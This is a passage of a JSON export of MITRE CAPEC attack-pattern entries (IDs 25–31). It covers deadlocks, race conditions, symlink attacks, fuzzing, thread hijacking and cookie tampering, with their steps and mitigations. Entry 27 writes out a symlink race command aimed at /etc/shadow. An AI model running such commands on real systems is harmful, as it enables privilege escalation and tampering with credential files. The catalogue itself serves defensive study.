processing code might be examining a transaction in real-time processing, but the oversized transaction causes a logic branch or an exception of some kind that is trapped. In other words, the transaction is still executed, but the logging or filtering mechanism still fails. This has two consequences, the first being that you can run transactions that are not logged in any way (or perhaps the log entry is completely corrupted). The second consequence is that you might slip through an active filter that otherwise would stop your attack."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"120"},{"CWE_ID":"119"},{"CWE_ID":"118"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"680"},{"CWE_ID":"733"},{"CWE_ID":"697"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"}]}},"25":{"ID":"25","Name":"Forced Deadlock","Abstraction":"Meta","Status":"Stable","Description":"The adversary triggers and exploits a deadlock condition in the target software to cause a denial of service. A deadlock can occur when two or more competing actions are waiting for each other to finish, and thus neither ever does. Deadlock conditions can be difficult to detect.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"The adversary initiates an exploratory phase to get familiar with the system."},{"Step":"2","Phase":"Explore","Description":"The adversary triggers a first action (such as holding a resource) and initiates a second action which will wait for the first one to finish."},{"Step":"3","Phase":"Explore","Description":"If the target program has a deadlock condition, the program waits indefinitely resulting in a denial of service."}]},"Prerequisites":{"Prerequisite":["The target host has a deadlock condition. There are four conditions for a deadlock to occur, known as the Coffman conditions. [REF-101]","The target host exposes an API to the user."]},"Skills_Required":{"Skill":["This type of attack may be sophisticated and require knowledge about the system\'s resources and APIs.",{"Level":"Medium"}]},"Consequences":{"Consequence":{"Scope":"Availability","Impact":"Resource Consumption","Note":"A successful forced deadlock attack compromises the availability of the system by exhausting its available resources."}},"Mitigations":{"Mitigation":["Use known algorithm to avoid deadlock condition (for instance non-blocking synchronization algorithms).","For competing actions, use well-known libraries which implement synchronization."]},"Example_Instances":{"Example":"An example of a deadlock which may occur in database products is the following. Client applications using the database may require exclusive access to a table, and in order to gain exclusive access they ask for a lock. If one client application holds a lock on a table and attempts to obtain the lock on a second table that is already held by a second client application, this may lead to deadlock if the second application then attempts to obtain the lock that is held by the first application (Source: Wikipedia, http://en.wikipedia.org/wiki/Deadlock)"},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"412"},{"CWE_ID":"567"},{"CWE_ID":"662"},{"CWE_ID":"667"},{"CWE_ID":"833"},{"CWE_ID":"1322"}]},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-101","Section":"Deadlock"},{"External_Reference_ID":"REF-609","Section":"Testing for XML Injection"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns, Type (Relationship -> Attack_Pattern)"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Activation_Zone, Attack_Motivation-Consequences, Attack_Phases, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Probing_Techniques, Related_Weaknesses, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Prerequisites"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Related_Weaknesses"}]}},"26":{"ID":"26","Name":"Leveraging Race Conditions","Abstraction":"Meta","Status":"Stable","Description":"The adversary targets a race condition occurring when multiple processes access and manipulate the same resource concurrently, and the outcome of the execution depends on the particular order in which the access takes place. The adversary can leverage a race condition by \\"running the race\\", modifying the resource and modifying the normal execution flow. For instance, a race condition can occur while accessing a file: the adversary can trick the system by replacing the original file with their version and cause the system to read the malicious file.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"The adversary explores to gauge what level of access they have."},{"Step":"2","Phase":"Experiment","Description":"The adversary gains access to a resource on the target host. The adversary modifies the targeted resource. The resource\'s value is used to determine the next normal execution action."},{"Step":"3","Phase":"Exploit","Description":"The resource is modified/checked concurrently by multiple processes. By using one of the processes, the adversary is able to modify the value just before it is consumed by a different process. A race condition occurs and is exploited by the adversary to abuse the target host."}]},"Prerequisites":{"Prerequisite":["A resource is accessed/modified concurrently by multiple processes such that a race condition exists.","The adversary has the ability to modify the resource."]},"Skills_Required":{"Skill":["Being able to \\"run the race\\" requires basic knowledge of concurrent processing including synchonization techniques.",{"Level":"Medium"}]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Use safe libraries to access resources such as files.","Be aware that improper use of access function calls such as chown(), tempfile(), chmod(), etc. can cause a race condition.","Use synchronization to control the flow of execution.","Use static analysis tools to find race conditions.","Pay attention to concurrency problems related to the access of resources."]},"Example_Instances":{"Example":["The Net Direct client for Linux before 6.0.5 in Nortel Application Switch 2424, VPN 3050 and 3070, and SSL VPN Module 1000 extracts and executes files with insecure permissions, which allows local users to exploit a race condition to replace a world-writable file in /tmp/NetClient and cause another user to execute arbitrary code when attempting to execute this client, as demonstrated by replacing /tmp/NetClient/client. See also: CVE-2007-1057",{"p":"The following code illustrates a file that is accessed multiple times by name in a publicly accessible directory. A race condition exists between the accesses where an attacker can replace the file referenced by the name (see [REF-107]).","div":["include <sys/types.h>",{"style":"margin-left:10px;","class":"informative","div":["int fd;",{"style":"margin-left:10px;","div":["return;",{"style":"margin-left:10px;"}]},"char *userstr;",{"style":"margin-left:10px;","div":["userstr = argv[1];",{"style":"margin-left:10px;"}]}]}]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"368"},{"CWE_ID":"363"},{"CWE_ID":"366"},{"CWE_ID":"370"},{"CWE_ID":"362"},{"CWE_ID":"662"},{"CWE_ID":"689"},{"CWE_ID":"667"},{"CWE_ID":"665"},{"CWE_ID":"1223"},{"CWE_ID":"1254"},{"CWE_ID":"1298"}]},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-105","Section":"Race condition"},{"External_Reference_ID":"REF-106"},{"External_Reference_ID":"REF-107","Section":"Test Case ID 1598"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns, Type (Relationship -> Attack_Pattern)"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Activation_Zone, Attack_Phases, Attack_Prerequisites, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required, Examples-Instances, References, Solutions_and_Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Example_Instances, Execution_Flow, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"27":{"ID":"27","Name":"Leveraging Race Conditions via Symbolic Links","Abstraction":"Detailed","Status":"Draft","Description":"This attack leverages the use of symbolic links (Symlinks) in order to write to sensitive files. An attacker can create a Symlink link to a target file not otherwise accessible to them. When the privileged program tries to create a temporary file with the same name as the Symlink link, it will actually write to the target file pointed to by the attackers\' Symlink link. If the attacker can insert malicious content in the temporary file they will be writing to the sensitive file by using the Symlink. The race occurs because the system checks if the temporary file exists, then creates the file. The attacker would typically create the Symlink during the interval between the check and the creation of the temporary file.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"29"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Verify that target host\'s platform supports symbolic links.] This attack pattern is only applicable on platforms that support symbolic links.","Technique":["Research target platform to determine whether it supports symbolic links.","Create a symbolic link and ensure that it works as expected on the given platform."]},{"Step":"2","Phase":"Explore","Description":"[Examine application\'s file I/O behavior] Analyze the application\'s file I/O behavior to determine where it stores files, as well as the operations it performs to read/write files.","Technique":["Use kernel tracing utility such as ktrace to monitor application behavior.","Use debugging utility such as File Monitor to monitor the application\'s filesystem I/O calls","Watch temporary directories to see when temporary files are created, modified and deleted.","Analyze source code for open-source systems like Linux, Apache, etc."]},{"Step":"3","Phase":"Experiment","Description":"[Verify ability to write to filesystem] The attacker verifies ability to write to the target host\'s file system.","Technique":["Create a file that does not exist in the target directory (e.g. \\"touch temp.txt\\" in UNIX-like systems)","On platforms that differentiate between file creation and file modification, if the target file that the application writes to already exists, attempt to modify it.","Verify permissions on target directory"]},{"Step":"4","Phase":"Exploit","Description":"[Replace file with a symlink to a sensitive system file.] Between the time that the application checks to see if a file exists (or if the user has access to it) and the time the application actually opens the file, the attacker replaces the file with a symlink to a sensitive system file.","Technique":["Create an infinite loop containing commands such as \\"rm -f tempfile.dat; ln -s /etc/shadow tempfile.dat\\". Wait for an instance where the following steps occur in the given order: (1) Application ensures that tempfile.dat exists and that the user has access to it, (2) \\"rm -f tempfile.dat; ln -s /etc/shadow tempfile.dat\\", and (3) Application opens tempfile.dat for writing, and inadvertently opens /etc/shadow for writing instead.","Use other techniques with debugging tools to replace the file between the time the application checks the file and the time the application opens it."]}]},"Prerequisites":{"Prerequisite":["The attacker is able to create Symlink links on the target host.","Tainted data from the attacker is used and copied to temporary files.","The target host does insecure temporary file creation."]},"Skills_Required":{"Skill":["This attack is sophisticated because the attacker has to overcome a few challenges such as creating symlinks on the target host during a precise timing, inserting malicious data in the temporary file and have knowledge about the temporary files created (file name and function which creates them).",{"Level":"Medium"}]},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Availability","Impact":"Resource Consumption","Note":"Denial of Service"}]},"Mitigations":{"Mitigation":["Use safe libraries when creating temporary files. For instance the standard library function mkstemp can be used to safely create temporary files. For shell scripts, the system utility mktemp does the same thing.","Access to the directories should be restricted as to prevent attackers from manipulating the files. Denying access to a file can prevent an attacker from replacing that file with a link to a sensitive file.","Follow the principle of least privilege when assigning access rights to files.","Ensure good compartmentalization in the system to provide protected areas that can be trusted."]},"Example_Instances":{"Example":[{"p":["In this naive example, the Unix program foo is setuid. Its function is to retrieve information for the accounts specified by the user. For \\"efficiency,\\" it sorts the requested accounts into a temporary file (/tmp/foo naturally) before making the queries.","The directory /tmp is world-writable. The malicious user creates a symbolic link to the file /.rhosts named /tmp/foo. Then, they invokes foo with \\"user\\" as the requested account. The program creates the (temporary) file /tmp/foo (really creating /.rhosts) and puts the requested account (e.g. \\"user password\\")) in it. It removes the temporary file (merely removing the symbolic link).","Now the /.rhosts contains + +, which is the incantation necessary to allow anyone to use rlogin to log into the computer as the superuser.","[REF-115]"]},"GNU \\"ed\\" utility (before 0.3) allows local users to overwrite arbitrary files via a symlink attack on temporary files, possibly in the open_sbuf function. See also: CVE-2006-6939","OpenmosixCollector and OpenMosixView in OpenMosixView 1.5 allow local users to overwrite or delete arbitrary files via a symlink attack on (1) temporary files in the openmosixcollector directory or (2) nodes.tmp. See also: CVE-2005-0894","Setuid product allows file reading by replacing a file being edited with a symlink to the targeted file, leaking the result in error messages when parsing fails. See also: CVE-2000-0972"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"367"},{"CWE_ID":"61"},{"CWE_ID":"662"},{"CWE_ID":"689"},{"CWE_ID":"667"}]},"References":{"Reference":[{"External_Reference_ID":"REF-115","Section":"Symlink race"},{"External_Reference_ID":"REF-116"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases, Examples-Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Example_Instances"}]}},"28":{"ID":"28","Name":"Fuzzing","Abstraction":"Meta","Status":"Draft","Description":"In this attack pattern, the adversary leverages fuzzing to try to identify weaknesses in the system. Fuzzing is a software security and functionality testing method that feeds randomly constructed input to the system and looks for an indication that a failure in response to that input has occurred. Fuzzing treats the system as a black box and is totally free from any preconceptions or assumptions about the system. Fuzzing can help an attacker discover certain assumptions made about user input in the system. Fuzzing gives an attacker a quick way of potentially uncovering some of these assumptions despite not necessarily knowing anything about the internals of the system. These assumptions can then be turned against the system by specially crafting user input that may allow an attacker to achieve their goals.","Likelihood_Of_Attack":"High","Typical_Severity":"Medium","Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Observe communication and inputs] The fuzzing attacker observes the target system looking for inputs and communications between modules, subsystems, or systems.","Technique":["Network sniffing. Using a network sniffer such as wireshark, the attacker observes communications into and out of the target system.","Monitor API execution. Using a tool such as ktrace, strace, APISpy, or another debugging tool, the attacker observes the system calls and API calls that are made by the target system, and the nature of their parameters.","Observe inputs using web inspection tools (OWASP\'s WebScarab, Paros, TamperData, TamperIE, etc.)"]},{"Step":"2","Phase":"Experiment","Description":"[Generate fuzzed inputs] Given a fuzzing tool, a target input or protocol, and limits on time, complexity, and input variety, generate a list of inputs to try. Although fuzzing is random, it is not exhaustive. Parameters like length, composition, and how many variations to try are important to get the most cost-effective impact from the fuzzer.","Technique":["Boundary cases. Generate fuzz inputs that attack boundary cases of protocol fields, inputs, or other communications limits. Examples include 0xff and 0x00 for single-byte inputs. In binary situations, approach each bit of an individual field with on and off (e.g., 0x80).","Attempt arguments to system calls or APIs. The variations include payloads that, if they were successful, could lead to a compromise on the system."]},{"Step":"3","Phase":"Experiment","Description":"[Observe the outcome] Observe the outputs to the inputs fed into the system by fuzzers and see if anything interesting happens. If failure occurs, determine why that happened. Figure out the underlying assumption that was invalidated by the input."},{"Step":"4","Phase":"Exploit","Description":"[Craft exploit payloads] Put specially crafted input into the system that leverages the weakness identified through fuzzing and allows to achieve the goals of the attacker. Fuzzers often reveal ways to slip through the input validation filters and introduce unwanted data into the system.","Technique":["Identify and embed shell code for the target system.","Embed higher level attack commands in the payload. (e.g., SQL, PHP, server-side includes, etc.)","Induce denial of service by exploiting resource leaks or bad error handling."]}]},"Skills_Required":{"Skill":["There is a wide variety of fuzzing tools available.",{"Level":"Low"}]},"Resources_Required":{"Resource":"Fuzzing tools."},"Indicators":{"Indicator":"A lot of invalid data is fed to the system. Data that cannot have been generated through a legitimate transaction/request. Data is coming into the system within a short period of time and potentially from the same IP."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Alter Execution Logic"}]},"Mitigations":{"Mitigation":["Test to ensure that the software behaves as per specification and that there are no unintended side effects. Ensure that no assumptions about the validity of data are made.","Use fuzz testing during the software QA process to uncover any surprises, uncover any assumptions or unexpected behavior."]},"Example_Instances":{"Example":"A fuzz test reveals that when data length for a particular field exceeds certain length, the input validation filter fails and lets the user data in unfiltered. This provides an attacker with an injection vector to deliver the malicious payload into the system."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"74"},{"CWE_ID":"20"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Description Summary, Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"29":{"ID":"29","Name":"Leveraging Time-of-Check and Time-of-Use (TOCTOU) Race Conditions","Abstraction":"Standard","Status":"Draft","Description":"This attack targets a race condition occurring between the time of check (state) for a resource and the time of use of a resource. A typical example is file access. The adversary can leverage a file access race condition by \\"running the race\\", meaning that they would modify the resource between the first time the target program accesses the file and the time the target program uses the file. During that period of time, the adversary could replace or modify the file, causing the application to behave unexpectedly.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"26","Exclude_Related":{"Exclude_ID":"515"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"The adversary explores to gauge what level of access they have."},{"Step":"2","Phase":"Experiment","Description":"The adversary confirms access to a resource on the target host. The adversary confirms ability to modify the targeted resource."},{"Step":"3","Phase":"Exploit","Description":"The adversary decides to leverage the race condition by \\"running the race\\", meaning that they would modify the resource between the first time the target program accesses the file and the time the target program uses the file. During that period of time, the adversary can replace the resource and cause an escalation of privilege."}]},"Prerequisites":{"Prerequisite":["A resource is access/modified concurrently by multiple processes.","The adversary is able to modify resource.","A race condition exists while accessing a resource."]},"Skills_Required":{"Skill":["This attack can get sophisticated since the attack has to occur within a short interval of time.",{"Level":"Medium"}]},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Alter Execution Logic"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Availability","Impact":"Resource Consumption","Note":"Denial of Service"}]},"Mitigations":{"Mitigation":["Use safe libraries to access resources such as files.","Be aware that improper use of access function calls such as chown(), tempfile(), chmod(), etc. can cause a race condition.","Use synchronization to control the flow of execution.","Use static analysis tools to find race conditions.","Pay attention to concurrency problems related to the access of resources."]},"Example_Instances":{"Example":["The Net Direct client for Linux before 6.0.5 in Nortel Application Switch 2424, VPN 3050 and 3070, and SSL VPN Module 1000 extracts and executes files with insecure permissions, which allows local users to exploit a race condition to replace a world-writable file in /tmp/NetClient and cause another user to execute arbitrary code when attempting to execute this client, as demonstrated by replacing /tmp/NetClient/client. See also: CVE-2007-1057",{"p":["The following code illustrates a file that is accessed multiple times by name in a publicly accessible directory. A race condition exists between the accesses where an adversary can replace the file referenced by the name.","[REF-107]"],"div":["include <sys/types.h>",{"style":"margin-left:10px;","class":"bad","div":["int fd;",{"style":"margin-left:10px;","div":["return;",{"style":"margin-left:10px;"}]},"char *userstr;",{"style":"margin-left:10px;","div":["userstr = argv[1];",{"style":"margin-left:10px;"}]}]}]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"367"},{"CWE_ID":"368"},{"CWE_ID":"366"},{"CWE_ID":"370"},{"CWE_ID":"362"},{"CWE_ID":"662"},{"CWE_ID":"691"},{"CWE_ID":"663"},{"CWE_ID":"665"}]},"References":{"Reference":[{"External_Reference_ID":"REF-131"},{"External_Reference_ID":"REF-107","Section":"Test Case ID 1598"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Attack_Prerequisites, Description Summary, Examples-Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Execution_Flow, Related_Attack_Patterns"}]}},"30":{"ID":"30","Name":"Hijacking a Privileged Thread of Execution","Abstraction":"Standard","Status":"Draft","Description":"An adversary hijacks a privileged thread of execution by injecting malicious code into a running process. By using a privleged thread to do their bidding, adversaries can evade process-based detection that would stop an attack that creates a new process. This can lead to an adversary gaining access to the process\'s memory and can also enable elevated privileges. The most common way to perform this attack is by suspending an existing thread and manipulating its memory.","Likelihood_Of_Attack":"Low","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"233","Exclude_Related":{"Exclude_ID":"515"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine target thread] The adversary determines the underlying system thread that is subject to user-control"},{"Step":"2","Phase":"Experiment","Description":"[Gain handle to thread] The adversary then gains a handle to a process thread.","Technique":["Use the \\"OpenThread\\" API call in Windows on a known thread.","Cause an exception in a java privileged block public function and catch it, or catch a normal signal. The thread is then hanging and the adversary can attempt to gain a handle to it."]},{"Step":"3","Phase":"Experiment","Description":"[Alter process memory] Once the adversary has a handle to the target thread, they will suspend the thread and alter the memory using native OS calls.","Technique":"On Windows, use \\"SuspendThread\\" followed by \\"VirtualAllocEx\\", \\"WriteProcessMemory\\", and \\"SetThreadContext\\"."},{"Step":"4","Phase":"Exploit","Description":"[Resume thread execution] Once the process memory has been altered to execute malicious code, the thread is then resumed.","Technique":"On Windows, use \\"ResumeThread\\"."}]},"Prerequisites":{"Prerequisite":["The application in question employs a threaded model of execution with the threads operating at, or having the ability to switch to, a higher privilege level than normal users","In order to feasibly execute this class of attacks, the adversary must have the ability to hijack a privileged thread. This ability includes, but is not limited to, modifying environment variables that affect the process the thread belongs to, or calling native OS calls that can suspend and alter process memory. This does not preclude network-based attacks, but makes them conceptually more difficult to identify and execute."]},"Skills_Required":{"Skill":["Hijacking a thread involves knowledge of how processes and threads function on the target platform, the design of the target application as well as the ability to identify the primitives to be used or manipulated to hijack the thread.",{"Level":"High"}]},"Resources_Required":{"Resource":{"p":["None: No specialized resources are required to execute this type of attack. The adversary needs to be able to latch onto a privileged thread.","The adversary does, however, need to be able to program, compile, and link to the victim binaries being executed so that it will turn control of a privileged thread over to the adversary\'s malicious code. This is the case even if the adversary conducts the attack remotely."]}},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}]},"Mitigations":{"Mitigation":["Application Architects must be careful to design callback, signal, and similar asynchronous constructs such that they shed excess privilege prior to handing control to user-written (thus untrusted) code.","Application Architects must be careful to design privileged code blocks such that upon return (successful, failed, or unpredicted) that privilege is shed prior to leaving the block/scope."]},"Example_Instances":{"Example":"Adversary targets an application written using Java\'s AWT, with the 1.2.2 era event model. In this circumstance, any AWTEvent originating in the underlying OS (such as a mouse click) would return a privileged thread (e.g., a system call). The adversary could choose to not return the AWT-generated thread upon consuming the event, but instead leveraging its privilege to conduct privileged operations."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"270"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1055.003","Entry_Name":"Process Injection:Thread Execution Hijacking"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Attack_Prerequisites, Description Summary, Examples-Instances, Probing_Techniques, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Description Summary, Examples-Instances, Probing_Techniques"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow, Related_Attack_Patterns, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow, Prerequisites"}]}},"31":{"ID":"31","Name":"Accessing/Intercepting/Modifying HTTP Cookies","Abstraction":"Detailed","Status":"Draft","Description":"This attack relies on the use of HTTP Cookies to store credentials, state information and other critical data on client systems. There are several different forms of this attack. The first form of this attack involves accessing HTTP Cookies to mine for potentially sensitive data contained therein. The second form involves intercepting this data as it is transmitted from client to server. This intercepted information is then used by the adversary to impersonate the remote user/session. The third form is when the cookie\'s content is modified by the adversary before it is sent back to the server. Here the adversary seeks to convince the target server to operate on this falsified information.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"39"},{"Nature":"ChildOf","CAPEC_ID":"157","Exclude_Related":{"Exclude_ID":"513"}}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Obtain copy of cookie] The adversary first needs to obtain a copy of the cookie. The adversary may be a legitimate end user wanting to escalate privilege, or could be somebody sniffing on a network to get a copy of HTTP cookies.","Technique":["Sniff cookie using a network sniffer such as Wireshark","Obtain cookie using a utility such as the Firefox Cookie Manager, Chrome DevTools or AnEC Cookie Editor.","Steal cookie via a cross-site scripting attack.","Guess cookie contents if it contains predictable information."]},{"Step":"2","Phase":"Experiment","Description":"[Obtain sensitive information from cookie] The adversary may be able to get sensitive information from the cookie. The web application developers may have assumed that cookies are not accessible by end users, and thus, may have put potentially sensitive information in them.","Technique":["If cookie shows any signs of being encoded using a standard scheme such as base64, decode it.","Analyze the cookie\'s contents to determine whether it contains any sensitive information."]},{"Step":"3","Phase":"Experiment","Description":"[Modify cookie to subvert security controls.] The adversary may be able to modify or replace cookies to bypass security controls in the application.","Technique":["Modify logical parts of cookie and send it back to server to observe the effects.","Modify numeric parts of cookie arithmetically and send it back to server to observe the effects.","Modify cookie bitwise and send it back to server to observe the effects.","Replace cookie with an older legitimate cookie and send it back to server to observe the effects. This technique would be helpful in cases where the cookie contains a \\"points balance\\" for a given user where the points have some value. The user may spend their points and then replace their cookie with an older one to restore their balance."]}]},"Prerequisites":{"Prerequisite":["Target server software must be a HTTP daemon that relies on cookies.","The cookies must contain sensitive information.","The adversary must be able to make HTTP requests to the server, and the cookie must be contained in the reply."]},"Skills_Required":{"Skill":["To overwrite session cookie data, and submit targeted attacks via HTTP",{"Level":"Low"},"Exploiting a remote buffer overflow generated by attack",{"Level":"High"}]},"Resources_Required":{"Resource":"A utility that allows for the viewing and modification of cookies. Many modern web browsers support this behavior."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Design: Use input validation for cookies","Design: Generate and validate MAC for cookies","Implementation: Use SSL/TLS to protect cookie in transit","Implementation: Ensure the web server implements all relevant security patches, many exploitable buffer overflows are fixed in patches issued for the software."]},"Example_Instances":{"Example":"There are two main attack vectors for exploiting poorly protected session variables like cookies. One is the local machine itself which can be exploited directly at the physical level or indirectly through XSS and phishing. In addition, the adversary in the middle attack (CAPEC-94) relies on a network sniffer, proxy, or other intermediary to intercept the subject\'s credentials and use them to impersonate the digital subject on the host. The issue is that once the credentials are intercepted, impersonation is trivial for the adversary to accomplish if no other protection mechanisms are in place. See also: CVE-2010-5148 , 